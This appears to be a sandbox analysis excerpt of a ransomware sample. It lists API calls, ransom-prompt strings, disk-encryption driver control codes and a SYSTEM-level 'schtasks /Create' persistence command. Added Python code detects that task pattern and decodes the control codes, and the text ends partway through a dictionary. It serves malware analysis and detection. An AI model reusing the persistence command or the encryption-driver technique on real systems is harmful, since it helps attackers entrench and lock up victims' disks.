                                                                      • GetMessageTime.USER32 ref: 00DF4A97
                                                                      • GetOEMCP.KERNEL32 ref: 00DF4AA3
                                                                      • GetCursorInfo.USER32(?), ref: 00DF4ACE
                                                                      • GetCaretPos.USER32(?), ref: 00DF4ADB
                                                                      • GetCurrentThread.KERNEL32 ref: 00DF4AFD
                                                                      • GetThreadTimes.KERNEL32(00000000), ref: 00DF4B04
                                                                      • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00DF4B23
                                                                      • GetProcessTimes.KERNEL32(00000000), ref: 00DF4B26
                                                                      • GetCurrentProcess.KERNEL32(00000028,00000028), ref: 00DF4B32
                                                                      • GetProcessMemoryInfo.PSAPI(00000000), ref: 00DF4B35
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00DF4B3F
                                                                      • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00DF4B49
                                                                      • EnumWindows.USER32(Function_00003DF0,00000117), ref: 00DF4BAD
                                                                        • Part of subcall function 00DF3D00: TlsGetValue.KERNEL32(?), ref: 00DF3D19
                                                                        • Part of subcall function 00DF3D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF3D31
                                                                        • Part of subcall function 00DF3D00: TlsSetValue.KERNEL32(?,00000000), ref: 00DF3D46
                                                                        • Part of subcall function 00DF3D00: DeviceIoControl.KERNEL32(00000000,00220020,00740000,00000000,00000000,00000000,?,00000000), ref: 00DF3D5E
                                                                        • Part of subcall function 00DF3D00: GetLastError.KERNEL32 ref: 00DF3D68
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentWindow$Thread$ActiveClipboardCursorInfoLastMemoryStatusTimesValue$CaptureCaretCodeControlCountCounterCreateDesktopDeviceEnumErrorFileFocusForegroundGlobalHeapInputMessageOpenOwnerPagePerformancePopupQueryQueueShellStateTickTimeWindows__getch_nolock__lock
                                                                      • String ID: ($@
                                                                      • API String ID: 2217453591-1311469180
                                                                      • Opcode ID: f8d2d1d3fb161a7edcd9ca52a3eb4d3fb3b34fb22b4820548ad213e8d6b2b1ef
                                                                      • Instruction ID: a6a14b2d8285d27f7764813cda8e09be1af99236a9a96014c2f85a246c2af725
                                                                      • Opcode Fuzzy Hash: f8d2d1d3fb161a7edcd9ca52a3eb4d3fb3b34fb22b4820548ad213e8d6b2b1ef
                                                                      • Instruction Fuzzy Hash: E3810B71C012289FDB20AF75DC487E9BBB8FB08301F058599E649A7261DB759AC8CF61
                                                                      APIs
                                                                      • GetDesktopWindow.USER32 ref: 00DF49C3
                                                                      • GetForegroundWindow.USER32 ref: 00DF49CB
                                                                      • GetShellWindow.USER32 ref: 00DF49D7
                                                                      • GetCapture.USER32 ref: 00DF49E3
                                                                      • GetClipboardOwner.USER32 ref: 00DF49EF
                                                                      • GetOpenClipboardWindow.USER32 ref: 00DF49FB
                                                                      • GetCurrentProcessId.KERNEL32 ref: 00DF4A07
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00DF4A13
                                                                      • GetTickCount.KERNEL32 ref: 00DF4A1F
                                                                      • GetFocus.USER32 ref: 00DF4A2B
                                                                      • GetActiveWindow.USER32 ref: 00DF4A37
                                                                      • GetKBCodePage.USER32 ref: 00DF4A43
                                                                      • GetCursor.USER32 ref: 00DF4A4F
                                                                      • GetLastActivePopup.USER32(?), ref: 00DF4A62
                                                                      • GetProcessHeap.KERNEL32 ref: 00DF4A6E
                                                                      • GetQueueStatus.USER32(000004BF), ref: 00DF4A7F
                                                                      • GetInputState.USER32 ref: 00DF4A8B
                                                                      • GetMessageTime.USER32 ref: 00DF4A97
                                                                      • GetOEMCP.KERNEL32 ref: 00DF4AA3
                                                                      • GetCursorInfo.USER32(?), ref: 00DF4ACE
                                                                      • GetCaretPos.USER32(?), ref: 00DF4ADB
                                                                      • GetCurrentThread.KERNEL32 ref: 00DF4AFD
                                                                      • GetThreadTimes.KERNEL32(00000000), ref: 00DF4B04
                                                                      • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00DF4B23
                                                                      • GetProcessTimes.KERNEL32(00000000), ref: 00DF4B26
                                                                      • GetCurrentProcess.KERNEL32(00000028,00000028), ref: 00DF4B32
                                                                      • GetProcessMemoryInfo.PSAPI(00000000), ref: 00DF4B35
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00DF4B3F
                                                                      • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00DF4B49
                                                                      • EnumWindows.USER32(Function_00003DF0,00000117), ref: 00DF4BAD
                                                                        • Part of subcall function 00DF3D00: TlsGetValue.KERNEL32(?), ref: 00DF3D19
                                                                        • Part of subcall function 00DF3D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF3D31
                                                                        • Part of subcall function 00DF3D00: TlsSetValue.KERNEL32(?,00000000), ref: 00DF3D46
                                                                        • Part of subcall function 00DF3D00: DeviceIoControl.KERNEL32(00000000,00220020,00740000,00000000,00000000,00000000,?,00000000), ref: 00DF3D5E
                                                                        • Part of subcall function 00DF3D00: GetLastError.KERNEL32 ref: 00DF3D68
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentWindow$Thread$ActiveClipboardCursorInfoLastMemoryStatusTimesValue$CaptureCaretCodeControlCountCounterCreateDesktopDeviceEnumErrorFileFocusForegroundGlobalHeapInputMessageOpenOwnerPagePerformancePopupQueryQueueShellStateTickTimeWindows
                                                                      • String ID: ($@
                                                                      • API String ID: 3079641271-1311469180
                                                                      • Opcode ID: 9eec7e6bb879fa08688c2f23efa70666c166e5e01bd3b8cb3dfa52fa39d30b99
                                                                      • Instruction ID: 030d3b58b4ab21e6ae7d8d247107ebf82c1fe919cfa3e5b64755305876d42571
                                                                      • Opcode Fuzzy Hash: 9eec7e6bb879fa08688c2f23efa70666c166e5e01bd3b8cb3dfa52fa39d30b99
                                                                      • Instruction Fuzzy Hash: CA61FC75C012199FCB20AFB1DC48BEDBBB8FB08301F058599E649A3251DB759AC8CF61
                                                                      APIs
                                                                      • GetDesktopWindow.USER32 ref: 00DF49C3
                                                                      • GetForegroundWindow.USER32 ref: 00DF49CB
                                                                      • GetShellWindow.USER32 ref: 00DF49D7
                                                                      • GetCapture.USER32 ref: 00DF49E3
                                                                      • GetClipboardOwner.USER32 ref: 00DF49EF
                                                                      • GetOpenClipboardWindow.USER32 ref: 00DF49FB
                                                                      • GetCurrentProcessId.KERNEL32 ref: 00DF4A07
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00DF4A13
                                                                      • GetTickCount.KERNEL32 ref: 00DF4A1F
                                                                      • GetFocus.USER32 ref: 00DF4A2B
                                                                      • GetActiveWindow.USER32 ref: 00DF4A37
                                                                      • GetKBCodePage.USER32 ref: 00DF4A43
                                                                      • GetCursor.USER32 ref: 00DF4A4F
                                                                      • GetLastActivePopup.USER32(?), ref: 00DF4A62
                                                                      • GetProcessHeap.KERNEL32 ref: 00DF4A6E
                                                                      • GetQueueStatus.USER32(000004BF), ref: 00DF4A7F
                                                                      • GetInputState.USER32 ref: 00DF4A8B
                                                                      • GetMessageTime.USER32 ref: 00DF4A97
                                                                      • GetOEMCP.KERNEL32 ref: 00DF4AA3
                                                                      • GetCursorInfo.USER32(?), ref: 00DF4ACE
                                                                      • GetCaretPos.USER32(?), ref: 00DF4ADB
                                                                      • GetCurrentThread.KERNEL32 ref: 00DF4AFD
                                                                      • GetThreadTimes.KERNEL32(00000000), ref: 00DF4B04
                                                                      • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00DF4B23
                                                                      • GetProcessTimes.KERNEL32(00000000), ref: 00DF4B26
                                                                      • GetCurrentProcess.KERNEL32(00000028,00000028), ref: 00DF4B32
                                                                      • GetProcessMemoryInfo.PSAPI(00000000), ref: 00DF4B35
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00DF4B3F
                                                                      • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00DF4B49
                                                                      • EnumWindows.USER32(Function_00003DF0,00000117), ref: 00DF4BAD
                                                                        • Part of subcall function 00DF3D00: TlsGetValue.KERNEL32(?), ref: 00DF3D19
                                                                        • Part of subcall function 00DF3D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF3D31
                                                                        • Part of subcall function 00DF3D00: TlsSetValue.KERNEL32(?,00000000), ref: 00DF3D46
                                                                        • Part of subcall function 00DF3D00: DeviceIoControl.KERNEL32(00000000,00220020,00740000,00000000,00000000,00000000,?,00000000), ref: 00DF3D5E
                                                                        • Part of subcall function 00DF3D00: GetLastError.KERNEL32 ref: 00DF3D68
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentWindow$Thread$ActiveClipboardCursorInfoLastMemoryStatusTimesValue$CaptureCaretCodeControlCountCounterCreateDesktopDeviceEnumErrorFileFocusForegroundGlobalHeapInputMessageOpenOwnerPagePerformancePopupQueryQueueShellStateTickTimeWindows
                                                                      • String ID: ($@
                                                                      • API String ID: 3079641271-1311469180
                                                                      • Opcode ID: 1b448373cfe78428009df115d48d24c0abd6558a74958dcf2802140d83f9874e
                                                                      • Instruction ID: 4aa290a3b61b635b3a3d1c73ff178fbdd0b7d896c8ed62726f0bb4716a5f2b0b
                                                                      • Opcode Fuzzy Hash: 1b448373cfe78428009df115d48d24c0abd6558a74958dcf2802140d83f9874e
                                                                      • Instruction Fuzzy Hash: 0B61FC75C012199FCB10AFB1DC48BEDBBB8FB08301F058599E649A7251DB759AC8CF61
                                                                      APIs
                                                                      • _wprintf.LIBCMT ref: 00DF456B
                                                                        • Part of subcall function 00DF61C0: __lock.LIBCMT ref: 00DF61CE
                                                                        • Part of subcall function 00DF61C0: __getch_nolock.LIBCMT ref: 00DF61D8
                                                                      • GetLogicalDrives.KERNEL32 ref: 00DF4578
                                                                      • _memset.LIBCMT ref: 00DF45D0
                                                                      • GetDriveTypeW.KERNEL32(?), ref: 00DF45DF
                                                                      • PathAppendW.SHLWAPI(?,Readme.txt), ref: 00DF45F2
                                                                        • Part of subcall function 00DF4490: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF44AA
                                                                        • Part of subcall function 00DF4490: GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF44BD
                                                                        • Part of subcall function 00DF4490: GetProcessHeap.KERNEL32(00000000,00000001,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF44D0
                                                                        • Part of subcall function 00DF4490: HeapAlloc.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF44D7
                                                                        • Part of subcall function 00DF4490: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF44F3
                                                                        • Part of subcall function 00DF4490: GetProcessHeap.KERNEL32(00000000,00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF4504
                                                                        • Part of subcall function 00DF4490: HeapFree.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF450B
                                                                        • Part of subcall function 00DF4490: CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF4513
                                                                      • _wprintf.LIBCMT ref: 00DF4673
                                                                      • _wprintf.LIBCMT ref: 00DF4680
                                                                      • _wscanf.LIBCMT ref: 00DF46AC
                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00DF46BC
                                                                      • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00DF46D4
                                                                      • _wprintf.LIBCMT ref: 00DF46F7
                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00DF4706
                                                                      • GetConsoleScreenBufferInfo.KERNEL32(00000000,?), ref: 00DF4712
                                                                      • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,?,00000000,?), ref: 00DF4735
                                                                      • SetConsoleCursorPosition.KERNEL32(00000000,00000000), ref: 00DF473D
                                                                      • _wprintf.LIBCMT ref: 00DF474E
                                                                      • _wprintf.LIBCMT ref: 00DF475B
                                                                      • _wscanf.LIBCMT ref: 00DF4787
                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00DF4797
                                                                      • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00DF47AF
                                                                      • _wprintf.LIBCMT ref: 00DF47C2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: _wprintf$Heap$ConsoleCreateFile$EventHandleObjectProcessSingleWait_wscanf$AllocAppendBufferCharacterCloseCursorDriveDrivesFillFreeInfoLogicalOutputPathPositionReadScreenSizeType__getch_nolock__lock_memset
                                                                      • String ID: Disable your anti-virus and anti-malware programs$Enter password#2: $Files decryption completed$:$Incorrect password$Readme.txt$Visit
                                                                      • API String ID: 2127848508-3595650393
                                                                      • Opcode ID: 254c177ec870f8730d04c1877c005fde17021e22a613c8d289584fb990d901e7
                                                                      • Instruction ID: 5c9b9b6ec10bb6e1976f4c189b24a5816fc48850d7162bd02b4fd256712cf76f
                                                                      • Opcode Fuzzy Hash: 254c177ec870f8730d04c1877c005fde17021e22a613c8d289584fb990d901e7
                                                                      • Instruction Fuzzy Hash: 0661A371D01718AFDB10EB659C45BEE7BB4EF48701F0580A9E609F6280EB719A848FB5
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00DF6674,00E05CD0,00000014), ref: 00DFA207
                                                                      • __mtterm.LIBCMT ref: 00DFA213
                                                                        • Part of subcall function 00DF9F4C: RtlDecodePointer.NTDLL(00000005), ref: 00DF9F5D
                                                                        • Part of subcall function 00DF9F4C: TlsFree.KERNEL32(00000003,00DFA375,?,00DF6674,00E05CD0,00000014), ref: 00DF9F77
                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00DFA229
                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00DFA236
                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00DFA243
                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00DFA250
                                                                      • TlsAlloc.KERNEL32(?,00DF6674,00E05CD0,00000014), ref: 00DFA2A0
                                                                      • TlsSetValue.KERNEL32(00000000,?,00DF6674,00E05CD0,00000014), ref: 00DFA2BB
                                                                      • __init_pointers.LIBCMT ref: 00DFA2C5
                                                                      • RtlEncodePointer.NTDLL ref: 00DFA2D6
                                                                      • RtlEncodePointer.NTDLL ref: 00DFA2E3
                                                                      • RtlEncodePointer.NTDLL ref: 00DFA2F0
                                                                      • RtlEncodePointer.NTDLL ref: 00DFA2FD
                                                                      • RtlDecodePointer.NTDLL(00DFA0D0), ref: 00DFA31E
                                                                      • __calloc_crt.LIBCMT ref: 00DFA333
                                                                      • RtlDecodePointer.NTDLL(00000000), ref: 00DFA34D
                                                                      • __initptd.LIBCMT ref: 00DFA358
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00DFA35F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                      • API String ID: 3732613303-3819984048
                                                                      • Opcode ID: fd3f799cdf78aa5102c6903df2b95804f5a98b5e5242cc25d4d96756d620453a
                                                                      • Instruction ID: bec6385d19dfddf11e0a4583e3f0ee2f008a0a335a0082197ae68e96e312900b
                                                                      • Opcode Fuzzy Hash: fd3f799cdf78aa5102c6903df2b95804f5a98b5e5242cc25d4d96756d620453a
                                                                      • Instruction Fuzzy Hash: 743162B19053089FCB206B7BBD0572E7AE5EB45720719413AE614F31B0DB3A94C8CF62
                                                                      APIs
                                                                      • GetLocalTime.KERNEL32(?), ref: 00DF592B
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DF593F
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DF5979
                                                                      • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00DF598B
                                                                      • PathAppendW.SHLWAPI(?,?), ref: 00DF59F8
                                                                        • Part of subcall function 00DF57B0: _vswprintf_s.LIBCMT ref: 00DF57DB
                                                                        • Part of subcall function 00DF5810: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00DF585A
                                                                        • Part of subcall function 00DF5810: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00DF5870
                                                                        • Part of subcall function 00DF5810: lstrcatW.KERNEL32(?,\cmd.exe,?,?), ref: 00DF5886
                                                                        • Part of subcall function 00DF5810: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00DF58EE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Time$System$DirectoryFile$AppendCreateEnvironmentLocalPathProcessVariable_vswprintf_slstrcat
                                                                      • String ID: $ $ $.$/$d$f$r$s$schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00$u$w$x
                                                                      • API String ID: 980647657-2418224214
                                                                      • Opcode ID: d6bd9c16a3d182db967a07696b8028f39a2bb2f31bab8995a1fdd3472c713121
                                                                      • Instruction ID: ed004e1f270f9abcd7189fe7782a8f12737d0fccb86ce691785bdb146beefba0
                                                                      • Opcode Fuzzy Hash: d6bd9c16a3d182db967a07696b8028f39a2bb2f31bab8995a1fdd3472c713121
                                                                      • Instruction Fuzzy Hash: 5C3174B1D0025C9BDB10DF90EC94BFEBBB9EB44345F008599E60576251DBB65A8CCFA0
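The function above builds the command line `schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00`, derives the /ST value from GetLocalTime through a SystemTimeToFileTime / FileTimeToSystemTime round trip (the offset added in between is not visible in the listing), and hands the result to %ComSpec%\cmd.exe via CreateProcessW with creation flags 0x08000000 (CREATE_NO_WINDOW). The detection below is an added example, not code from the report or from the sample: it parses process-creation command lines, extracts the schtasks /Create switches, and flags one-shot tasks that run as SYSTEM and fire within minutes of the event, plus the viserion_<n> task-name pattern. The log records, event timestamp and file paths are constructed for the example.

```python
import re
from datetime import datetime, timedelta

# Splits a Windows command line into arguments, keeping double-quoted runs
# together (quotes removed). Sufficient for schtasks switch parsing.
_TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
_SCHTASKS_RE = re.compile(r'(?i)^(?:.*[\\/])?schtasks(?:\.exe)?$')
# schtasks switches that consume the following argument as their value
_VALUE_SWITCHES = {'SC', 'TN', 'RU', 'RP', 'TR', 'ST', 'SD', 'ED', 'MO', 'S', 'U', 'P'}
# Task-name format string carried by the function in the listing: viserion_%u
_TASK_NAME_RE = re.compile(r'^viserion_\d+$', re.IGNORECASE)
# Flag one-shot tasks scheduled to fire within this window of the event time
_NEAR_FUTURE = timedelta(minutes=30)


def tokenize(cmdline):
    return [quoted or bare for quoted, bare in _TOKEN_RE.findall(cmdline)]


def parse_schtasks_create(cmdline):
    """Return the switches of a 'schtasks /Create' command line as a dict
    (switch name upper-cased -> value or True), or None for anything else."""
    toks = tokenize(cmdline)
    if not toks or not _SCHTASKS_RE.match(toks[0]):
        return None
    switches = {}
    i = 1
    while i < len(toks):
        tok = toks[i]
        if tok.startswith('/'):
            key = tok[1:].upper()
            has_value = (key in _VALUE_SWITCHES and i + 1 < len(toks)
                         and not toks[i + 1].startswith('/'))
            switches[key] = toks[i + 1] if has_value else True
            i += 2 if has_value else 1
        else:
            i += 1
    return switches if 'CREATE' in switches else None


def assess(cmdline, event_time):
    """Reasons this command line matches the one-shot SYSTEM task pattern.
    An empty list means the record is not flagged."""
    sw = parse_schtasks_create(cmdline)
    if sw is None:
        return []
    reasons = []
    ru = str(sw.get('RU', '')).upper()
    if ru in ('SYSTEM', 'NT AUTHORITY\\SYSTEM'):
        reasons.append('runs as SYSTEM (/RU)')
    st = sw.get('ST')
    if str(sw.get('SC', '')).upper() == 'ONCE' and isinstance(st, str):
        try:
            hh, mm, *_ = (int(x) for x in st.split(':'))
            start = event_time.replace(hour=hh, minute=mm, second=0, microsecond=0)
            if start < event_time:       # /ST earlier than now means tomorrow
                start += timedelta(days=1)
            delta = start - event_time
            if delta <= _NEAR_FUTURE:
                reasons.append('one-shot task fires in %d min' % (delta.total_seconds() // 60))
        except ValueError:
            pass                        # malformed /ST: skip the timing check
    tn = sw.get('TN')
    if isinstance(tn, str) and _TASK_NAME_RE.match(tn):
        reasons.append('task name matches viserion_<n>: ' + tn)
    return reasons


# Constructed process-creation command lines (not taken from the report) and a
# constructed local event timestamp; the first and last mimic the pattern.
EVENT_TIME = datetime(2025, 1, 15, 14, 20, 0)
SAMPLE_CMDLINES = [
    'schtasks /Create /SC ONCE /TN viserion_23 /RU SYSTEM /TR "C:\\Windows\\example.exe" /ST 14:35:00',
    'schtasks /Create /SC DAILY /TN Backup\\Nightly /TR "C:\\Tools\\backup.exe" /ST 02:00',
    'schtasks /Query /TN viserion_23',
    'SCHTASKS.EXE /create /tn Updater /ru "NT AUTHORITY\\SYSTEM" /sc ONCE /st 14:21 /tr "C:\\Users\\Public\\u.exe"',
]


def scan(cmdlines, event_time=EVENT_TIME):
    """Return (cmdline, reasons) for every record that is flagged."""
    hits = []
    for cmdline in cmdlines:
        reasons = assess(cmdline, event_time)
        if reasons:
            hits.append((cmdline, reasons))
    return hits


if __name__ == '__main__':
    for cmdline, reasons in scan(SAMPLE_CMDLINES):
        print(cmdline)
        for reason in reasons:
            print('   ', reason)
```

The /RU and /SC checks are the generic part and correspond to the "Schtasks Creation Or Modification With SYSTEM Privileges" signature in the report; the task-name regex is specific to this sample's format string and is only useful as a secondary indicator, since a recompiled variant can change it.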
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00DF4E24
                                                                      • GetConsoleScreenBufferInfo.KERNEL32(00000000,?), ref: 00DF4E31
                                                                      • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,?,00000000,?), ref: 00DF4E58
                                                                      • SetConsoleCursorPosition.KERNEL32(00000000,00000000), ref: 00DF4E60
                                                                      • _wprintf.LIBCMT ref: 00DF4E6B
                                                                      • TlsGetValue.KERNEL32(?,0022003C,?,00000298,?,00000298,?,00000000), ref: 00DF4ED8
                                                                      • DeviceIoControl.KERNEL32(00000000), ref: 00DF4EDF
                                                                      • _wprintf.LIBCMT ref: 00DF4F95
                                                                      • TlsGetValue.KERNEL32(?,00220038,?,00000298,?,00000298,?,00000000), ref: 00DF4FD6
                                                                      • DeviceIoControl.KERNEL32(00000000), ref: 00DF4FDD
                                                                      • _wprintf.LIBCMT ref: 00DF5006
                                                                      • _wprintf.LIBCMT ref: 00DF5013
                                                                      • _wprintf.LIBCMT ref: 00DF503A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: _wprintf$Console$ControlDeviceValue$BufferCharacterCursorFillHandleInfoOutputPositionScreen
                                                                      • String ID: Decryption error %d$Disk decryption completed$%-.3f %%$Disk decryption progress...
                                                                      • API String ID: 3598326828-3817340760
                                                                      • Opcode ID: f8763f5d7261aa125a4109017d0d72dd7358e35ed2144390ec48335d0304018c
                                                                      • Instruction ID: 26b24d3c644acf9bff9cdccf68627c92b701da77ea2d3a1147ca0397745c146c
                                                                      • Opcode Fuzzy Hash: f8763f5d7261aa125a4109017d0d72dd7358e35ed2144390ec48335d0304018c
                                                                      • Instruction Fuzzy Hash: 0E5106B1E0061C9FDB249B64DC45BFFB7B8FB44701F058199E609E6290EA305E84CFA4
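The DeviceIoControl calls on the `\\.\dcrypt` handle (control code 0x220020 in the subcall listed above, 0x22003C and 0x220038 in the progress loop here) are how the console component drives the disk-encryption driver. The helper below is an added example, not code from the report or from the sample: it decodes Windows I/O control codes into their CTL_CODE fields so an analyst can read function numbers, transfer method and required access off a listing like this one. The device-type, method and access names are the winioctl.h constants; the list of codes is taken from this listing.

```python
# Windows I/O control codes follow the CTL_CODE layout from winioctl.h:
#   bits 31..16 DeviceType, 15..14 RequiredAccess, 13..2 Function, 1..0 Method
METHODS = {0: 'METHOD_BUFFERED', 1: 'METHOD_IN_DIRECT',
           2: 'METHOD_OUT_DIRECT', 3: 'METHOD_NEITHER'}
ACCESS = {0: 'FILE_ANY_ACCESS', 1: 'FILE_READ_ACCESS',
          2: 'FILE_WRITE_ACCESS', 3: 'FILE_READ_ACCESS|FILE_WRITE_ACCESS'}
# A few well-known device types; values >= 0x8000 are reserved for vendors
DEVICE_TYPES = {0x07: 'FILE_DEVICE_DISK', 0x09: 'FILE_DEVICE_FILE_SYSTEM',
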